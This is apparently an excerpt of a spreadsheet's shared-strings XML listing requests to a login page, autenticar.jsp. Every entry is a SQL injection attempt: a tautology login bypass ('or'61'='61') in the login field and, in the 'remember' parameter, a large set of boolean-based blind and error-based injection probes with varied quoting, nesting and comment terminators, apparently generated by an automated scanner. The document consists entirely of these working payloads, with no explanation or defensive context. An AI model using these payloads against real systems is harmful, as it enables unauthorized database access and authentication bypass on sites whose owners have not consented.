    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6136&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2277")ornot(5450=6352)--and("umjm"like"umjm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8658")ornot(4202=4202)--and("wcql"like"wcql&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9634")ornot(7292=9856)--and("qpkh"like"qpkh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5152&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5754"))ornot(9959=2625)--and(("cypj"like"cypj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7228"))ornot(4202=4202)--and(("gqrf"like"gqrf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6905"))ornot(36=1660)--and(("vyxb"like"vyxb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6658&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4376")))ornot(3428=3660)--and((("gcpe"like"gcpe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9900")))ornot(4202=4202)--and((("awhe"like"awhe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8949")))ornot(8961=5782)--and((("iiga"like"iiga&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5291&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2727"ornot(2482=9890)--and"hyrz"like"hyrz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6672"ornot(4202=4202)--and"tzbx"like"tzbx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5301"ornot(1642=8629)--and"eyir"like"eyir&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select(casewhen(9770=4414)thenelse1/(select0)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select(casewhen(4962=4962)thenelse1/(select0)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select(casewhen(5065=4585)thenelse1/(select0)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(1796=3387)then1else1/(select0)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(5987=5987)then1else1/(select0)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(1131=3008)then1else1/(select0)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(6129=1116)thenelse1/(select0)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(4419=4419)thenelse1/(select0)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(1514=6367)thenelse1/(select0)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and5023=6926#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and1774=1774#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and6824=3563#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and1600=3900#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and1774=1774#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and9883=272#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8708=57#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and1774=1774#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and4244=3944#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and2526=5616#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and1774=1774#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and3574=3076#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and6401=7620#and(7989=7989&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and1774=1774#and(5197=5197&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and1724=277#and(1053=1053&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and9924=6351#and((3224=3224&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and1774=1774#and((9848=9848&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and8724=7860#and((1911=1911&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and8784=2875#and(((4047=4047&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and1774=1774#and(((3448=3448&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and9705=8672#and(((7666=7666&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and9762=2156#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and1774=1774#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and8397=2268#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and9763=8978#and('cvra'='cvra&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and1774=1774#and('wogd'='wogd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and7893=5074#and('krzh'='krzh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and7537=6221#and(('rhnu'='rhnu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and1774=1774#and(('lzhh'='lzhh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and3757=9950#and(('cugw'='cugw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and762=3847#and((('pmvg'='pmvg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and1774=1774#and((('ejjp'='ejjp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and5100=2590#and((('wfpv'='wfpv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and5152=8724#and'pexk'='pexk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and1774=1774#and'pfmn'='pfmn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8831=6438#and'lywz'='lywz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and1530=4912#and('lslt'like'lslt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and1774=1774#and('zprd'like'zprd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and1301=4754#and('tiei'like'tiei&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and7089=5613#and(('oqpj'like'oqpj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and1774=1774#and(('gtbl'like'gtbl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and6815=2596#and(('hpfr'like'hpfr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and1711=8021#and((('xeok'like'xeok&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and1774=1774#and((('owci'like'owci&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and4477=5683#and((('hhrn'like'hhrn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and5624=4872#and'gcqn'like'gcqn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and1774=1774#and'llso'like'llso&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and2149=3440#and'zbjj'like'zbjj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and4492=2568#and("pyxt"="pyxt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and1774=1774#and("xhgk"="xhgk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and6469=1252#and("shqh"="shqh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and2647=693#and(("cpod"="cpod&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and1774=1774#and(("ckos"="ckos&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and4248=3398#and(("vkab"="vkab&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and2123=8493#and((("ihus"="ihus&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and1774=1774#and((("zxct"="zxct&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and9639=2276#and((("axly"="axly&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and2185=2384#and"okwi"="okwi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and1774=1774#and"zkrm"="zkrm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and9068=7240#and"zhku"="zhku&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and4765=1144#and("oieg"like"oieg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and1774=1774#and("syxp"like"syxp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and7089=4098#and("fygh"like"fygh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and3414=9425#and(("itps"like"itps&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and1774=1774#and(("akay"like"akay&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and4802=3230#and(("pxqn"like"pxqn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and9381=6752#and((("qtms"like"qtms&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and1774=1774#and((("tdtg"like"tdtg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and9677=4332#and((("mwdf"like"mwdf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and3108=6911#and"jhbp"like"jhbp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and1774=1774#and"ljws"like"ljws&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and6361=6890#and"xspm"like"xspm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7392&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6137)ornot(7129=5026)#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1141)ornot(4823=4823)#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1387)ornot(5537=8515)#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6357&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7287')ornot(5550=4931)#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6946')ornot(4823=4823)#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1392')ornot(752=1847)#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7048&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2016'ornot(1993=4798)#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4643'ornot(4823=4823)#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2876'ornot(5373=8783)#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5592&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4832"ornot(836=9439)#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3128"ornot(4823=4823)#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9677"ornot(5779=664)#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6361&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9859)ornot(4353=4590)#and(9190=9190&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7398)ornot(4823=4823)#and(7473=7473&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8938)ornot(2188=8924)#and(3810=3810&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3115&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9577))ornot(8951=7110)#and((8562=8562&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7091))ornot(4823=4823)#and((1902=1902&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2433))ornot(4738=7951)#and((2822=2822&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6421&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3873)))ornot(2215=5914)#and(((6989=6989&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3699)))ornot(4823=4823)#and(((755=755&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7437)))ornot(1134=9997)#and(((3551=3551&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7603&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1623ornot(1098=5133)#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-769ornot(4823=4823)#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8363ornot(1111=9529)#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6087&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8448')ornot(199=9586)#and('blov'='blov&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6459')ornot(4823=4823)#and('blag'='blag&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4343')ornot(5609=3807)#and('njxc'='njxc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4640&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4525'))ornot(6135=9743)#and(('kysm'='kysm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8935'))ornot(4823=4823)#and(('ndeo'='ndeo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-41'))ornot(9206=9175)#and(('bwmk'='bwmk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8646&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8246')))ornot(290=1020)#and((('butz'='butz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1104')))ornot(4823=4823)#and((('smld'='smld&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3320')))ornot(476=6842)#and((('hfcd'='hfcd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3475&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9696'ornot(5305=369)#and'eqyy'='eqyy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6639'ornot(4823=4823)#and'blwx'='blwx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7993'ornot(4639=6549)#and'slbj'='slbj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8268&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8755')ornot(1884=1758)#and('fpna'like'fpna&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4613')ornot(4823=4823)#and('ailf'like'ailf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2682')ornot(1161=7989)#and('evvr'like'evvr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6645&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3506'))ornot(8776=8323)#and(('tjsk'like'tjsk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1965'))ornot(4823=4823)#and(('zlyp'like'zlyp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1280'))ornot(5464=2142)#and(('livo'like'livo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9024&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7973')))ornot(4666=7245)#and((('wxdv'like'wxdv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3921')))ornot(4823=4823)#and((('rzvv'like'rzvv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2773')))ornot(9117=4079)#and((('exci'like'exci&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2652&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7453'ornot(6960=2530)#and'kwyt'like'kwyt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4025'ornot(4823=4823)#and'plmx'like'plmx&amp;modo=entrar</t>
